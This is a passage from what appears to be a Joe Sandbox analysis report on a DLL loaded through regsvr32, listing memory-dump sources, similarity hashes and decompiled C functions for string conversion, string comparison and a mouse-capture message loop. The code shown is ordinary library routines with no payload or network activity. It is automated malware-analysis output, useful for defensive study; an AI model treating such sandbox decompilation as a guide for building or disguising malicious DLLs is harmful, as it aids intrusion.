                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1877664794-0
                                                                                                                • Opcode ID: 31a5804d88825593c8e5a19e73390321cc22ec94f356a1a5629cb7ca7f31cdb2
                                                                                                                • Instruction ID: af1b9d0b361e8316da3ec2ee59257911741e438ffdcaf767e901d315e256d08a
                                                                                                                • Opcode Fuzzy Hash: 31a5804d88825593c8e5a19e73390321cc22ec94f356a1a5629cb7ca7f31cdb2
                                                                                                                • Instruction Fuzzy Hash: E0418D72A00A589FEB30CFB5CC85BDE7BA8EF05750F218119E9599B282DB70D9848F51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 74%
                                                                                                                			E100010EB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t26;
                                                                                                                				void* _t36;
                                                                                                                				void* _t37;
                                                                                                                				void* _t44;
                                                                                                                				void* _t45;
                                                                                                                				WCHAR* _t62;
                                                                                                                				intOrPtr _t63;
                                                                                                                				CHAR* _t65;
                                                                                                                				intOrPtr _t66;
                                                                                                                				void* _t67;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_t60 = __edx;
                                                                                                                				_push(0x10);
                                                                                                                				E100476B6(0x1008d7bb, __ebx, __edi, __esi);
                                                                                                                				_t62 =  *(_t67 + 8);
                                                                                                                				_t65 = 0;
                                                                                                                				if((0 | _t62 != 0x00000000) == 0) {
                                                                                                                					_push(0x80004005);
                                                                                                                					L10001401(__ebx, __ecx, __edx, _t62, 0, _t67);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t67 - 0x1c)) =  *0x100bb480();
                                                                                                                				 *(_t67 - 0x18) = _t65;
                                                                                                                				 *(_t67 - 4) = _t65;
                                                                                                                				if(_t62 != _t65) {
                                                                                                                					 *((intOrPtr*)(_t67 - 0x14)) = lstrlenW(_t62) + 1;
                                                                                                                					_t44 = L10001357(_t67 - 0x14, lstrlenW(_t62) + 1, 2);
                                                                                                                					_t68 = _t68 + 0xc;
                                                                                                                					if(_t44 >= 0) {
                                                                                                                						_t66 =  *((intOrPtr*)(_t67 - 0x14));
                                                                                                                						_t76 = _t66 - 0x400;
                                                                                                                						if(_t66 > 0x400) {
                                                                                                                							L8:
                                                                                                                							_t45 = L100012BC(0x400, _t67 - 0x18, _t60, _t62, __eflags, _t66);
                                                                                                                						} else {
                                                                                                                							_push(_t66);
                                                                                                                							if(L10001492(0x400, _t60, _t62, _t66, _t76) == 0) {
                                                                                                                								goto L8;
                                                                                                                							} else {
                                                                                                                								E10048380(_t66);
                                                                                                                								_t45 = _t68;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t65 = L100010B4(_t45, _t62, _t66,  *((intOrPtr*)(_t67 - 0x1c)));
                                                                                                                					}
                                                                                                                				}
                                                                                                                				CharLowerA(_t65);
                                                                                                                				if(_t65 == 0) {
                                                                                                                					L12:
                                                                                                                					_t26 = 0;
                                                                                                                				} else {
                                                                                                                					 *((intOrPtr*)(_t67 - 0x14)) = lstrlenA(_t65) + 1;
                                                                                                                					_t36 = L10001357(_t67 - 0x14, lstrlenA(_t65) + 1, 2);
                                                                                                                					_t68 = _t68 + 0xc;
                                                                                                                					if(_t36 >= 0) {
                                                                                                                						_t63 =  *((intOrPtr*)(_t67 - 0x14));
                                                                                                                						__eflags = _t63 - 0x400;
                                                                                                                						if(__eflags > 0) {
                                                                                                                							L16:
                                                                                                                							_t37 = L100012BC(0x400, _t67 - 0x18, _t60, _t63, __eflags, _t63);
                                                                                                                						} else {
                                                                                                                							_push(_t63);
                                                                                                                							__eflags = L10001492(0x400, _t60, _t63, _t65, __eflags);
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L16;
                                                                                                                							} else {
                                                                                                                								E10048380(_t63);
                                                                                                                								_t37 = _t68;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t26 = L10001398(_t37, _t65, _t63,  *((intOrPtr*)(_t67 - 0x1c)));
                                                                                                                						_t62 =  *(_t67 + 8);
                                                                                                                					} else {
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L10001389(L1000146A(0x400, _t60, _t62, _t65, _t67, _t62, E100483AC(_t62) + 1, _t26), _t67 - 0x18);
                                                                                                                				return E10047739(0x400, _t62, _t65);
                                                                                                                			}


                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16lstrlen$CharH_prolog3_Lower
                                                                                                                • String ID:
                                                                                                                • API String ID: 4116776509-0
                                                                                                                • Opcode ID: 5a022c767afc5c677e1437f3c1c43d33b4a290dcb827912ab606d17bf4cce7f0
                                                                                                                • Instruction ID: 9d19a7622eb91d1bd22a87b9170e79a4f7ecf615831e20b68bd4b81b2f6b7c65
                                                                                                                • Opcode Fuzzy Hash: 5a022c767afc5c677e1437f3c1c43d33b4a290dcb827912ab606d17bf4cce7f0
                                                                                                                • Instruction Fuzzy Hash: E031E27AD00125ABEB01EBA48C86AFF3768EF41780F110025FE05F714AEA346E42C7E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 74%
                                                                                                                			E10001474(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t26;
                                                                                                                				void* _t36;
                                                                                                                				void* _t37;
                                                                                                                				void* _t44;
                                                                                                                				void* _t45;
                                                                                                                				WCHAR* _t62;
                                                                                                                				intOrPtr _t63;
                                                                                                                				CHAR* _t65;
                                                                                                                				intOrPtr _t66;
                                                                                                                				void* _t67;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_t60 = __edx;
                                                                                                                				_push(0x10);
                                                                                                                				E100476B6(0x1008d7f3, __ebx, __edi, __esi);
                                                                                                                				_t62 =  *(_t67 + 8);
                                                                                                                				_t65 = 0;
                                                                                                                				if((0 | _t62 != 0x00000000) == 0) {
                                                                                                                					_push(0x80004005);
                                                                                                                					L10001401(__ebx, __ecx, __edx, _t62, 0, _t67);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t67 - 0x1c)) =  *0x100bb480();
                                                                                                                				 *(_t67 - 0x18) = _t65;
                                                                                                                				 *(_t67 - 4) = _t65;
                                                                                                                				if(_t62 != _t65) {
                                                                                                                					 *((intOrPtr*)(_t67 - 0x14)) = lstrlenW(_t62) + 1;
                                                                                                                					_t44 = L10001357(_t67 - 0x14, lstrlenW(_t62) + 1, 2);
                                                                                                                					_t68 = _t68 + 0xc;
                                                                                                                					if(_t44 >= 0) {
                                                                                                                						_t66 =  *((intOrPtr*)(_t67 - 0x14));
                                                                                                                						_t76 = _t66 - 0x400;
                                                                                                                						if(_t66 > 0x400) {
                                                                                                                							L8:
                                                                                                                							_t45 = L100012BC(0x400, _t67 - 0x18, _t60, _t62, __eflags, _t66);
                                                                                                                						} else {
                                                                                                                							_push(_t66);
                                                                                                                							if(L10001492(0x400, _t60, _t62, _t66, _t76) == 0) {
                                                                                                                								goto L8;
                                                                                                                							} else {
                                                                                                                								E10048380(_t66);
                                                                                                                								_t45 = _t68;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t65 = L100010B4(_t45, _t62, _t66,  *((intOrPtr*)(_t67 - 0x1c)));
                                                                                                                					}
                                                                                                                				}
                                                                                                                				CharUpperA(_t65);
                                                                                                                				if(_t65 == 0) {
                                                                                                                					L12:
                                                                                                                					_t26 = 0;
                                                                                                                				} else {
                                                                                                                					 *((intOrPtr*)(_t67 - 0x14)) = lstrlenA(_t65) + 1;
                                                                                                                					_t36 = L10001357(_t67 - 0x14, lstrlenA(_t65) + 1, 2);
                                                                                                                					_t68 = _t68 + 0xc;
                                                                                                                					if(_t36 >= 0) {
                                                                                                                						_t63 =  *((intOrPtr*)(_t67 - 0x14));
                                                                                                                						__eflags = _t63 - 0x400;
                                                                                                                						if(__eflags > 0) {
                                                                                                                							L16:
                                                                                                                							_t37 = L100012BC(0x400, _t67 - 0x18, _t60, _t63, __eflags, _t63);
                                                                                                                						} else {
                                                                                                                							_push(_t63);
                                                                                                                							__eflags = L10001492(0x400, _t60, _t63, _t65, __eflags);
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L16;
                                                                                                                							} else {
                                                                                                                								E10048380(_t63);
                                                                                                                								_t37 = _t68;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t26 = L10001398(_t37, _t65, _t63,  *((intOrPtr*)(_t67 - 0x1c)));
                                                                                                                						_t62 =  *(_t67 + 8);
                                                                                                                					} else {
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L10001389(L1000146A(0x400, _t60, _t62, _t65, _t67, _t62, E100483AC(_t62) + 1, _t26), _t67 - 0x18);
                                                                                                                				return E10047739(0x400, _t62, _t65);
                                                                                                                			}















                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16lstrlen$CharH_prolog3_Upper
                                                                                                                • String ID:
                                                                                                                • API String ID: 2510594690-0
                                                                                                                • Opcode ID: 31b8b21528551e7caf2cc8c94ddfc67866e2f752817a23d77c51cc73f81293eb
                                                                                                                • Instruction ID: c739c987975fa42a882cae45f6a6da5a93788f44317763295bcd52b982e06518
                                                                                                                • Opcode Fuzzy Hash: 31b8b21528551e7caf2cc8c94ddfc67866e2f752817a23d77c51cc73f81293eb
                                                                                                                • Instruction Fuzzy Hash: 6C31A17AD01525ABFB11EB608C469FF3769EF45780F114025FE01F715ADE24AE4287E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E100442FE(void* __ecx, intOrPtr __edx) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				struct tagMSG _v32;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t30;
                                                                                                                				void* _t32;
                                                                                                                				void* _t34;
                                                                                                                				void* _t36;
                                                                                                                				intOrPtr* _t37;
                                                                                                                				void* _t41;
                                                                                                                				intOrPtr _t53;
                                                                                                                				void* _t54;
                                                                                                                				void* _t56;
                                                                                                                				void* _t57;
                                                                                                                				void* _t58;
                                                                                                                				intOrPtr* _t59;
                                                                                                                
                                                                                                                				_t55 = __edx;
                                                                                                                				_t51 = __ecx;
                                                                                                                				_t56 = GetCapture;
                                                                                                                				_t57 = __ecx;
                                                                                                                				if(GetCapture() != 0) {
                                                                                                                					L20:
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				E10013FEA(0, _t51, _t58, SetCapture( *( *((intOrPtr*)(_t57 + 0x68)) + 0x20)));
                                                                                                                				if(E10013FEA(0, _t51, _t58, GetCapture()) !=  *((intOrPtr*)(_t57 + 0x68))) {
                                                                                                                					L19:
                                                                                                                					E10044171(0, _t57, _t69);
                                                                                                                					goto L20;
                                                                                                                				} else {
                                                                                                                					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                                                                                                						_t30 = _v32.message - 0x100;
                                                                                                                						if(_t30 == 0) {
                                                                                                                							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                                                                                                                							if( *((intOrPtr*)(_t57 + 0x88)) != 0) {
                                                                                                                								_t51 = _t57;
                                                                                                                								E10043FC9(_t57, _v32.wParam, 1);
                                                                                                                							}
                                                                                                                							__eflags = _v32.wParam - 0x1b;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								L18:
                                                                                                                								_t32 = E10013FEA(0, _t51, _t58, GetCapture());
                                                                                                                								_t69 = _t32 -  *((intOrPtr*)(_t57 + 0x68));
                                                                                                                								if(_t32 ==  *((intOrPtr*)(_t57 + 0x68))) {
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						_t34 = _t30 - 1;
                                                                                                                						if(_t34 == 0) {
                                                                                                                							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                                                                                                                							if(__eflags != 0) {
                                                                                                                								_t51 = _t57;
                                                                                                                								E10043FC9(_t57, _v32.wParam, 0);
                                                                                                                							}
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						_t36 = _t34 - 0xff;
                                                                                                                						if(_t36 == 0) {
                                                                                                                							_t53 = _v32.pt;
                                                                                                                							_t55 = _v8;
                                                                                                                							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                                                                                                                							_push(_t53);
                                                                                                                							_push(_t53);
                                                                                                                							_t37 = _t59;
                                                                                                                							 *_t37 = _t53;
                                                                                                                							 *((intOrPtr*)(_t37 + 4)) = _v8;
                                                                                                                							_t51 = _t57;
                                                                                                                							if( *((intOrPtr*)(_t57 + 0x88)) == 0) {
                                                                                                                								E10043FFD(_t51, _t56);
                                                                                                                							} else {
                                                                                                                								E10043F4D(_t51);
                                                                                                                							}
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						_t41 = _t36;
                                                                                                                						if(_t41 == 0) {
                                                                                                                							__eflags =  *((intOrPtr*)(_t57 + 0x88));
                                                                                                                							_t54 = _t57;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								E100442BA(0, _t58, __eflags);
                                                                                                                							} else {
                                                                                                                								E100441B6(_t54, _t55, _t56, _t57, __eflags);
                                                                                                                							}
                                                                                                                							return 1;
                                                                                                                						}
                                                                                                                						if(_t41 == 0) {
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						DispatchMessageA( &_v32);
                                                                                                                						goto L18;
                                                                                                                					}
                                                                                                                					_push(_v32.wParam);
                                                                                                                					E1001935C();
                                                                                                                					goto L19;
                                                                                                                				}
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Capture$Message$Dispatch
                                                                                                                • String ID:
                                                                                                                • API String ID: 3654672037-0
                                                                                                                • Opcode ID: a6ca19de07636f760ffd3117dadc32a41dfb2d1a450fbb9ad055af08d0fe31e1
                                                                                                                • Instruction ID: 038cb224890085f827a759f96853b5fd9b84b1ba0a667fefa5421cfc8a7f22d1
                                                                                                                • Opcode Fuzzy Hash: a6ca19de07636f760ffd3117dadc32a41dfb2d1a450fbb9ad055af08d0fe31e1
                                                                                                                • Instruction Fuzzy Hash: C131B474A0020ADBDB50DFA488859AF77F9EB44A82F734439F445D2161CE70EE44D66A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E100010D7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t25;
                                                                                                                				char* _t26;
                                                                                                                				void* _t34;
                                                                                                                				void* _t36;
                                                                                                                				void* _t37;
                                                                                                                				void* _t43;
                                                                                                                				void* _t44;
                                                                                                                				void* _t46;
                                                                                                                				void* _t50;
                                                                                                                				void* _t53;
                                                                                                                				char* _t55;
                                                                                                                				intOrPtr _t56;
                                                                                                                				void* _t60;
                                                                                                                				void* _t61;
                                                                                                                
                                                                                                                				_t53 = __edx;
                                                                                                                				E100476B6(0x1008d74b, __ebx, __edi, __esi);
                                                                                                                				_t25 =  *0x100bb480(0xc);
                                                                                                                				_t55 = 0;
                                                                                                                				_t50 = _t25;
                                                                                                                				 *((intOrPtr*)(_t60 - 0x18)) = 0;
                                                                                                                				_t58 = lstrlenW;
                                                                                                                				 *((intOrPtr*)(_t60 - 4)) = 0;
                                                                                                                				if( *(_t60 + 0x10) != 0) {
                                                                                                                					 *((intOrPtr*)(_t60 - 0x14)) = lstrlenW( *(_t60 + 0x10)) + 1;
                                                                                                                					_t43 = L10001357(_t60 - 0x14, lstrlenW( *(_t60 + 0x10)) + 1, 2);
                                                                                                                					_t61 = _t61 + 0xc;
                                                                                                                					if(_t43 < 0) {
                                                                                                                						L8:
                                                                                                                						_push(0x8007000e);
                                                                                                                						L10001401(_t50, _t51, _t53, _t55, _t58, _t60);
                                                                                                                					} else {
                                                                                                                						_t56 =  *((intOrPtr*)(_t60 - 0x14));
                                                                                                                						_t66 = _t56 - 0x400;
                                                                                                                						if(_t56 > 0x400) {
                                                                                                                							L6:
                                                                                                                							_t51 = _t60 - 0x18;
                                                                                                                							_t44 = L100012BC(_t50, _t60 - 0x18, _t53, _t56, __eflags, _t56);
                                                                                                                						} else {
                                                                                                                							_t46 = L10001492(_t50, _t53, _t56, lstrlenW, _t66);
                                                                                                                							_t51 = _t56;
                                                                                                                							if(_t46 == 0) {
                                                                                                                								goto L6;
                                                                                                                							} else {
                                                                                                                								E10048380(_t56);
                                                                                                                								_t44 = _t61;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t55 = L100010B4(_t44,  *(_t60 + 0x10), _t56, _t50);
                                                                                                                						if(_t55 == 0) {
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t26 = 0;
                                                                                                                				if( *(_t60 + 0x18) != 0) {
                                                                                                                					 *((intOrPtr*)(_t60 - 0x14)) = lstrlenW( *(_t60 + 0x18)) + 1;
                                                                                                                					_t34 = L10001357(_t60 - 0x14, lstrlenW( *(_t60 + 0x18)) + 1, 2);
                                                                                                                					_t61 = _t61 + 0xc;
                                                                                                                					if(_t34 < 0) {
                                                                                                                						goto L8;
                                                                                                                					} else {
                                                                                                                						_t58 =  *((intOrPtr*)(_t60 - 0x14));
                                                                                                                						_t71 = _t58 - 0x400;
                                                                                                                						if(_t58 > 0x400) {
                                                                                                                							L14:
                                                                                                                							_t51 = _t60 - 0x18;
                                                                                                                							_t36 = L100012BC(_t50, _t60 - 0x18, _t53, _t55, __eflags, _t58);
                                                                                                                						} else {
                                                                                                                							_t37 = L10001492(_t50, _t53, _t55, _t58, _t71);
                                                                                                                							_t51 = _t58;
                                                                                                                							if(_t37 == 0) {
                                                                                                                								goto L14;
                                                                                                                							} else {
                                                                                                                								E10048380(_t58);
                                                                                                                								_t36 = _t61;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t26 = L100010B4(_t36,  *(_t60 + 0x18), _t58, _t50);
                                                                                                                						if(_t26 == 0) {
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L10001389(CompareStringA( *(_t60 + 8),  *(_t60 + 0xc), _t55,  *(_t60 + 0x14), _t26,  *(_t60 + 0x1c)), _t60 - 0x18);
                                                                                                                				return E10047739(_t50, _t55, _t27);
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10002395
                                                                                                                • lstrlenW.KERNEL32(?), ref: 100023B8
                                                                                                                • __alloca_probe_16.LIBCMT ref: 100023E9
                                                                                                                • lstrlenW.KERNEL32(?), ref: 10002420
                                                                                                                • __alloca_probe_16.LIBCMT ref: 10002451
                                                                                                                • CompareStringA.KERNEL32(?,?,00000000,?,00000000,?), ref: 10002480
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16lstrlen$CompareH_prolog3_String
                                                                                                                • String ID:
                                                                                                                • API String ID: 1160588780-0
                                                                                                                • Opcode ID: 9d013c2916ee938c159a400f5332b1904fa44bacd70884df55512697e3d458fb
                                                                                                                • Instruction ID: 96e6864510ac77364847bf10cd6c9172ca1897ca378224d80866f79966e83715
                                                                                                                • Opcode Fuzzy Hash: 9d013c2916ee938c159a400f5332b1904fa44bacd70884df55512697e3d458fb
                                                                                                                • Instruction Fuzzy Hash: EC318F7590011AABEF01DFA08D46AEF3BA9EF402D0F114125FE01E2156DB34AE61D7A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10001500(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t24;
                                                                                                                				CHAR* _t25;
                                                                                                                				void* _t33;
                                                                                                                				void* _t34;
                                                                                                                				void* _t41;
                                                                                                                				void* _t42;
                                                                                                                				void* _t54;
                                                                                                                				CHAR* _t56;
                                                                                                                				intOrPtr _t57;
                                                                                                                				intOrPtr _t61;
                                                                                                                				void* _t62;
                                                                                                                				void* _t63;
                                                                                                                				void* _t65;
                                                                                                                
                                                                                                                				_t54 = __edx;
                                                                                                                				E100476B6(0x1008d783, __ebx, __edi, __esi);
                                                                                                                				_t24 =  *0x100bb480(0x10);
                                                                                                                				_t56 = 0;
                                                                                                                				 *((intOrPtr*)(_t62 - 0x1c)) = _t24;
                                                                                                                				 *((intOrPtr*)(_t62 - 0x18)) = 0;
                                                                                                                				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                				if( *(_t62 + 0xc) != 0) {
                                                                                                                					 *((intOrPtr*)(_t62 - 0x14)) = lstrlenW( *(_t62 + 0xc)) + 1;
                                                                                                                					_t41 = L10001357(_t62 - 0x14, lstrlenW( *(_t62 + 0xc)) + 1, 2);
                                                                                                                					_t63 = _t63 + 0xc;
                                                                                                                					if(_t41 >= 0) {
                                                                                                                						_t57 =  *((intOrPtr*)(_t62 - 0x14));
                                                                                                                						_t69 = _t57 - 0x400;
                                                                                                                						if(_t57 > 0x400) {
                                                                                                                							L6:
                                                                                                                							_t42 = L100012BC(0x400, _t62 - 0x18, _t54, _t57, __eflags, _t57);
                                                                                                                						} else {
                                                                                                                							_push(_t57);
                                                                                                                							if(L10001492(0x400, _t54, _t57, lstrlenW, _t69) == 0) {
                                                                                                                								goto L6;
                                                                                                                							} else {
                                                                                                                								E10048380(_t57);
                                                                                                                								_t42 = _t63;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t56 = L100010B4(_t42,  *(_t62 + 0xc), _t57,  *((intOrPtr*)(_t62 - 0x1c)));
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t25 = 0;
                                                                                                                				if( *(_t62 + 8) != 0) {
                                                                                                                					 *((intOrPtr*)(_t62 - 0x14)) = lstrlenW( *(_t62 + 8)) + 1;
                                                                                                                					_t33 = L10001357(_t62 - 0x14, lstrlenW( *(_t62 + 8)) + 1, 2);
                                                                                                                					_t65 = _t63 + 0xc;
                                                                                                                					if(_t33 >= 0) {
                                                                                                                						_t61 =  *((intOrPtr*)(_t62 - 0x14));
                                                                                                                						__eflags = _t61 - 0x400;
                                                                                                                						if(__eflags > 0) {
                                                                                                                							L14:
                                                                                                                							_t34 = L100012BC(0x400, _t62 - 0x18, _t54, _t56, __eflags, _t61);
                                                                                                                						} else {
                                                                                                                							_push(_t61);
                                                                                                                							__eflags = L10001492(0x400, _t54, _t56, _t61, __eflags);
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L14;
                                                                                                                							} else {
                                                                                                                								E10048380(_t61);
                                                                                                                								_t34 = _t65;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t25 = L100010B4(_t34,  *(_t62 + 8), _t61,  *((intOrPtr*)(_t62 - 0x1c)));
                                                                                                                					} else {
                                                                                                                						_t25 = 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L10001389(lstrcmpiA(_t25, _t56), _t62 - 0x18);
                                                                                                                				return E10047739(0x400, _t56, _t26);
                                                                                                                			}
















                                                                                                                0x100025ab
                                                                                                                0x100025a9
                                                                                                                0x100025ef
                                                                                                                0x100025fe

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16lstrlen$H_prolog3_lstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 1103306039-0
                                                                                                                • Opcode ID: 511b95c1ad40573d413672c05b008e67172cb2b4439da7bc769cb913e5acf12d
                                                                                                                • Instruction ID: 9d3677159b335e25cff1d48c936262dc40f9816cf0325abab7cf80bf5a6e2688
                                                                                                                • Opcode Fuzzy Hash: 511b95c1ad40573d413672c05b008e67172cb2b4439da7bc769cb913e5acf12d
                                                                                                                • Instruction Fuzzy Hash: 08218F75D0051AAAEF00EBA08C569EF7BB9EF44281F114025FD05F715AEA30AF51CBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003E100(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr* _t78;
                                                                                                                				void* _t79;
                                                                                                                				void* _t80;
